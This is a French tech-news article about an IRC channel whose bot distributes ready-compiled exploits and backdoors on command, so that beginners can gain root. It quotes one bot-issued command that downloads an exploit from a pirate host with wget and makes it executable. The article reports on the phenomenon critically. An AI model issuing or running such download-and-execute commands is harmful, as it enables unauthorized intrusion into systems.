Devenir un hacker sans mettre le nez dans le code, c’est possible ! Pour cela il faut accéder aux exploits et backdoors permettant le piratage.
Soit l’on se nomme Goldstein ou Paradox et on comprend aisément le code source de l’exploit utilisé, soit l’on est capable d’utiliser un exploit publié pour s’introduire chez la cible à pirater. Mais en ces temps de modernité il est possible, sans se fatiguer, de polluer un ennemi, un concurrent que sais-je? Et cela tout simplement, en récupérant sur un chan IRC les commandes à utiliser et l’exploit qui correspond ! L’équipe de Zataz.com a découvert un Channel ayant un bot (robot) d’une grande générosité. Ce lieu de discussion et d’échange a été mis en place par un pirate ayant soigneusement pris le temps d’infiltrer des serveurs Web sur lesquels il a placé des exploits publics ou privés qui permettent d’agir selon le mot clé spécifié. Interrogé par le webzine un utilisateur explique le fonctionnement : « Ils vont télécharger des versions compilées d’un exploit, et il ne reste plus qu’à l’exécuter. » Ainsi un utilisateur malveillant va taper une commande dans le channel par exemple !uselib ou !backdoor et ensuite il laisse travailler le bot qui va rechercher dans sa base de données s’il est en possession d’un exploit correspondant à la demande. Un service à la carte en quelque sorte. Ensuite il communique une ligne ressemblant à : « wgetwww.sitepirate.com/Odays/uselib; chmod 777 uselib » qui correspond au lieu de stockage de la bête et à la commande système pour lancer le téléchargement. Il est alors possible de changer les droits de l’exploit et de l ?exécuter. Une fois la ligne copiée le black hacker devient root c’est-à-dire qu’il est considéré comme l’administrateur de la machine cible. Cette nouvelle est inquiétante, car à force de mettre à la disposition de pirates néophytes et malintentionnés des binaires particulièrement redoutables, l’on risque de voir dans les années à venir une explosion de l’amateurisme dans le piratage. Une nouvelle qui va faire froid dans le dos des responsables de la sécurité des réseaux d’entreprise.
Pour développer une version 7B de son modèle Codestral, Mistral AI n'a pas utilisé de…
L’Autorité de la concurrence et des marchés (CMA) britannique ouvre une enquête sur les conditions…
Thomas Gourand est nommé Directeur Général pour la France. Il est chargé du développement de…
Pour dissuader le CISPE d'un accord avec Microsoft, Google aurait mis près de 500 M€…
Pour réduire la taille des mises à jour de Windows, Microsoft va mettre en place…
De l'organisation administrative à la construction budgétaire, la Cour des comptes pointe le fonctionnement complexe…